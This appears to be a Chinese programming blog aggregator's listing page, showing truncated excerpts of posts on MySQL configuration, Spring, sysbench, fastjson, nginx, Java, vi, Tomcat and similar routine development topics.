linux 上mysql数据库区分大小写的配置 lower_case_table_names=1 1-不区分大小写 0-区分大小写修改/etc/my.cnf 具体的修改内容如下: [client] default-character-set=utf8 [mysqld] datadir=/var/lib/mysql socket=/va
我的spring学习笔记6-ApplicationContext实例化的参数兼容思想 aijuans Spring 3
ApplicationContext能读取多个Bean定义文件，方法是： ApplicationContext appContext = new ClassPathXmlApplicationContext（ new String[]｛“bean-config1.xml”，“bean-config2.xml”，“bean-config3.xml”，“bean-config4.xml
mysql 基准测试之sysbench annan211 基准测试 mysql基准测试 MySQL测试 sysbench
1 执行如下命令，安装sysbench-0.5： tar xzvf sysbench-0.5.tar.gz cd sysbench-0.5 chmod +x autogen.sh ./autogen.sh ./configure --with-mysql --with-mysql-includes=/usr/local/mysql
sql的复杂查询使用案列与技巧百合不是茶 oracle sql 函数数据分页合并查询
本片博客使用的数据库表是oracle中的scott用户表; ------------------- 自然连接查询查询 smith 的上司(两种方法) &
深入学习Thread类 bijian1013 java thread 多线程 java多线程
一．线程的名字下面来看一下Thread类的name属性，它的类型是String。它其实就是线程的名字。在Thread类中，有String getName()和void setName(String)两个方法用来设置和获取这个属性的值。同时，Thr
JSON串转换成Map以及如何转换到对应的数据类型 bijian1013 java fastjson net.sf.json
在实际开发中，难免会碰到JSON串转换成Map的情况，下面来看看这方面的实例。另外，由于fastjson只支持JDK1.5及以上版本，因此在JDK1.4的项目中可以采用net.sf.json来处理。一.fastjson实例 JsonUtil.java package com.study; impor
【RPC框架HttpInvoker一】HttpInvoker：Spring自带RPC框架 bit1129 spring
HttpInvoker是Spring原生的RPC调用框架，HttpInvoker同Burlap和Hessian一样，提供了一致的服务Exporter以及客户端的服务代理工厂Bean，这篇文章主要是复制粘贴了Hessian与Spring集成一文，【RPC框架Hessian四】Hessian与Spring集成在【RPC框架Hessian二】Hessian 对象序列化和反序列化一文中
【Mahout二】基于Mahout CBayes算法的20newsgroup的脚本分析 bit1129 Mahout
#!/bin/bash # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information re
nginx三种获取用户真实ip的方法 ronin47
随着nginx的迅速崛起，越来越多公司将apache更换成nginx. 同时也越来越多人使用nginx作为负载均衡, 并且代理前面可能还加上了CDN加速，但是随之也遇到一个问题：nginx如何获取用户的真实IP地址,如果后端是apache,请跳转到<apache获取用户真实IP地址>，如果是后端真实服务器是nginx，那么继续往下看。实例环境：用户IP 120.22.11.11
java-判断二叉树是不是平衡 bylijinnan java
参考了 http://zhedahht.blog.163.com/blog/static/25411174201142733927831/ 但是用java来实现有一个问题。由于Java无法像C那样“传递参数的地址，函数返回时能得到参数的值”，唯有新建一个辅助类：AuxClass import ljn.help.*; public class BalancedBTree {
BeanUtils.copyProperties VS PropertyUtils.copyProperties 诸葛不亮 PropertyUtils BeanUtils
BeanUtils.copyProperties VS PropertyUtils.copyProperties 作为两个bean属性copy的工具类，他们被广泛使用，同时也很容易误用，给人造成困然；比如：昨天发现同事在使用BeanUtils.copyProperties copy有integer类型属性的bean时，没有考虑到会将null转换为0，而后面的业
[金融与信息安全]最简单的数据结构最安全 comsci 数据结构
现在最流行的数据库的数据存储文件都具有复杂的文件头格式，用操作系统的记事本软件是无法正常浏览的，这样的情况会有什么问题呢？从信息安全的角度来看，如果我们数据库系统仅仅把这种格式的数据文件做异地备份，如果相同版本的所有数据库管理系统都同时被攻击，那么
vi区段删除 Cwind linux vi 区段删除
区段删除是编辑和分析一些冗长的配置文件或日志文件时比较常用的操作。简记下vi区段删除要点备忘。 vi概述引文中并未将末行模式单独列为一种模式。单不单列并不重要，能区分命令模式与末行模式即可。 vi区段删除步骤： 1. 在末行模式下使用:set nu显示行号非必须，随光标移动vi右下角也会显示行号，能够正确找到并记录删除开始行
清除tomcat缓存的方法总结 dashuaifu tomcat 缓存
用tomcat容器，大家可能会发现这样的问题，修改jsp文件后，但用IE打开依然是以前的Jsp的页面。出现这种现象的原因主要是tomcat缓存的原因。解决办法如下: 在jsp文件头加上 <meta http-equiv="Expires" content="0"> <meta http-equiv="kiben&qu
不要盲目的在项目中使用LESS CSS dcj3sjt126com Web less
　如果你还不知道LESS CSS是什么东西，可以看一下这篇文章，是我一朋友写给新人看的《CSS——LESS》　　不可否认，LESS CSS是个强大的工具，它弥补了css没有变量、无法运算等一些“先天缺陷”，但它似乎给我一种错觉，就是为了功能而实现功能。　　比如它的引用功能 ? .rounded_corners{
[入门]更上一层楼 dcj3sjt126com PHP yii2
更上一层楼通篇阅读完整个“入门”部分，你就完成了一个完整 Yii 应用的创建。在此过程中你学到了如何实现一些常用功能，例如通过 HTML 表单从用户那获取数据，从数据库中获取数据并以分页形式显示。你还学到了如何通过 Gii 去自动生成代码。使用 Gii 生成代码把 Web 开发中多数繁杂的过程转化为仅仅填写几个表单就行。本章将介绍一些有助于更好使用 Yii 的资源：
Apache HttpClient使用详解 eksliang httpclient http协议
Http协议的重要性相信不用我多说了，HttpClient相比传统JDK自带的URLConnection，增加了易用性和灵活性（具体区别，日后我们再讨论），它不仅是客户端发送Http请求变得容易，而且也方便了开发人员测试接口（基于Http协议的），即提高了开发的效率，也方便提高代码的健壮性。因此熟练掌握HttpClient是很重要的必修内容，掌握HttpClient后，相信对于Http协议的了解会
zxing二维码扫描功能 gundumw100 android zxing
经常要用到二维码扫描功能现给出示例代码 import com.google.zxing.WriterException; import com.zxing.activity.CaptureActivity; import com.zxing.encoding.EncodingHandler; import android.app.Activity; import an
纯HTML+CSS带说明的黄色导航菜单 ini html Web html5 css hovertree
HoverTree带说明的CSS菜单:纯HTML+CSS结构链接带说明的黄色导航在线体验效果：http://hovertree.com/texiao/css/1.htm代码如下,保存到HTML文件可以看到效果： <!DOCTYPE html > <html > <head> <title>HoverTree
fastjson初始化对性能的影响 kane_xie fastjson 序列化
之前在项目中序列化是用thrift，性能一般，而且需要用编译器生成新的类，在序列化和反序列化的时候感觉很繁琐，因此想转到json阵营。对比了jackson，gson等框架之后，决定用fastjson，为什么呢，因为看名字感觉很快。。。网上的说法： fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器，来自阿里巴巴的工程师开发。
基于Mybatis封装的增删改查实现通用自动化sql mengqingyu DAO
1.基于map或javaBean的增删改查可实现不写dao接口和实现类以及xml，有效的提高开发速度。 2.支持自定义注解包括主键生成、列重复验证、列名、表名等 3.支持批量插入、批量更新、批量删除 <bean id="dynamicSqlSessionTemplate" class="com.mqy.mybatis.support.Dynamic
js控制input输入框的方法封装(数字，中文，字母，浮点数等) qifeifei javascript js
在项目开发的时候，经常有一些输入框，控制输入的格式，而不是等输入好了再去检查格式，格式错了就报错，体验不好。 /** 数字，中文，字母,浮点数(+/-/.) 类型输入限制，只要在input标签上加上 jInput="number,chinese,alphabet,floating" 备注：floating属性只能单独用*/ funct
java 计时器应用 tangqi609567707 java timer
mport java.util.TimerTask; import java.util.Calendar; public class MyTask extends TimerTask { private static final int
erlang输出调用栈信息 wudixiaotie erlang
在erlang otp的开发中，如果调用第三方的应用，会有有些错误会不打印栈信息，因为有可能第三方应用会catch然后输出自己的错误信息，所以对排查bug有很大的阻碍，这样就要求我们自己打印调用的栈信息。用这个函数：erlang:process_display (self (), backtrace).需要注意这个函数只会输出到标准错误输出。也可以用这个函数：erlang:get_s